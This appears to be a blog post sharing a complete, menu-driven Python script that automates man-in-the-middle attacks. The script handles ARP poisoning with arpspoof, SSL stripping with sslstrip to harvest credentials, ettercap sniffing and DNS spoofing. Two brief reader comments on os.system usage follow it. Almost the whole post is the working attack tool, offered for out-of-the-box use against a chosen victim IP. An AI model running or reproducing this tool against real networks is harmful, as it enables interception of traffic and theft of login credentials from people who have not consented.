Spoofer – Automated arp / dns poisoning
I have knocked up a little menu driven python tool called spoofer. Spoofer takes the leg work out of getting a system set up for man in the middle attacks.
Here is the code:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 |
#!/usr/bin/python # # Usage: ./spoofer.py {adapter} {slave-ip} {gateway-ip} # eg: ./spoofer.py waln0 10.0.0.10 10.0.0.1 # # Requirements: # Dnsiff (arpspoof) - sslstrip - ettercap # from os import system, getuid from sys import argv, exit from time import sleep class colours: bold = '\033[1m' red = '\033[31m' green = '\033[32m' reset = '\033[0;0m' def arp_cleanup(): # stop arpspoof print "\n[+] Stopping arpspoof" system('killall arpspoof') sleep(1) # set ip_forward to 0 print "[+] Stopping IPv4 forwarding" system('echo 0 > /proc/sys/net/ipv4/ip_forward') sleep(1) # clear iptables rules print "[+] Flushing iptable rules" system("iptables -t nat -D PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter) sleep(1) # stop ssl strip print "[+] Stopping sslstrip\n" system('kill $(ps -ef | grep sslstrip | awk \'{print $2}\')') sleep(1) exit() def dns_cleanup(): raw_input('\n[+] Hit ENTER to exit') # stop arpspoof print "\n[+] Stopping dnsspoof" system('killall dnsspoof') sleep(2) print "[+] Stopping arpspoof" system('killall arpspoof') sleep(3) # stop dnsspoof # set ip_forward to 0 print "[+] Stopping IPv4 forwarding\n" system('echo 0 > /proc/sys/net/ipv4/ip_forward') sleep(1) exit() if getuid() != 0: print("You need to be root (sudo %s)" % argv[0]) else: if len(argv) < 2: system('clear') print("\nusage: %s adapter" % argv[0]) print("\teg: %s eth0\n" % argv[0]) else: # set some variables adapter = argv[1] spooftype = 0 while spooftype != range(1,3): system('clear') spooftype = raw_input("\nSelect spoof type:\n\n[1] arp poison\n[2] dns spoof\n\nspoofer > ") # arp spoof attack if spooftype == "1": slave = raw_input("\nEnter slave IP: > ") gateway = raw_input("Enter gateway IP: > ") # set rules for traffic forwarding print "\n[+] Setting iptable rules" system("iptables -t nat -A PREROUTING -i %s -p tcp --dport 80 -j REDIRECT --to-port 10000" % adapter) sleep(2) # start arp poison on slave / gateway print "[+] Starting arpspoof" system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway)) sleep(2) # start sslstrip to harvest credentials print "[+] Starting sslstrip" system('python /pentest/web/sslstrip/sslstrip.py -a -f -k > /dev/null 2>&1 &') sleep(2) # run ettercap against slave print "[+] Starting ettercap" system('xterm -e ettercap -T -q -i %s &' % adapter) sleep(2) # set ip forward mode system('echo 1 > /proc/sys/net/ipv4/ip_forward') sleep(1) print colours.bold + colours.red + "\n[+] Before exiting quit ettercap gracefully. (hit Q in the ettercap window)" + colours.reset raw_input('\n[+] Hit ENTER to exit') # clean up arp_cleanup() if spooftype == "2": slave = raw_input("\nEnter slave IP: > ") gateway = raw_input("Enter gateway IP: > ") # arp poison slave / gateway print colours.bold + colours.green + "\n[+] Poisoning..." + colours.reset system('arpspoof -i %s -t %s %s > /dev/null 2>&1 &' % (adapter, slave, gateway)) sleep(2) # set ip forward mode system('echo 1 > /proc/sys/net/ipv4/ip_forward') sleep(1) # start dnsspoof system('dnsspoof -i %s -f /root/hosts.txt host %s and udp port 53 > /dev/null 2>&1 &' % (adapter, slave)) #clear up dns_cleanup() |
Spoofer relies on you having the dsniff and sslstrip tools installed. This script runs out of the box on BackTrack and requires little modification for any other linux flavours.
You really should use subprocess.call() as apposed to os.system()
the commands he is running are perfectly fine in os.system..